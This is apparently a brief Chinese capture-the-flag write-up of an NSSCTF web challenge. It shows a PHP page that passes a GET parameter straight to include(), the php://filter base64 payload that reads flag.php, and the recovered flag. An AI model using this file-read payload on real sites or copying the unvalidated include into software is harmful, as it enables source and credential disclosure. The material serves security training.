题目
![](https://i-blog.csdnimg.cn/direct/0ab320f6087c437eaba34be7c617b7a1.png)
<html>
<title>Here's a secret. Can you find it?</title>
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
include($file);
}else{
highlight_file(__FILE__);
}
?>
</html>
读取flag
/?file=php://filter/read=convert.base64-encode/resource=flag.php
![](https://i-blog.csdnimg.cn/direct/53a5da3ed44f43de87bac0e55ed45736.png)
使用bp解码
拿下flag
NSSCTF{00bb1bc4-f867-45af-b88b-02b18cd6725b};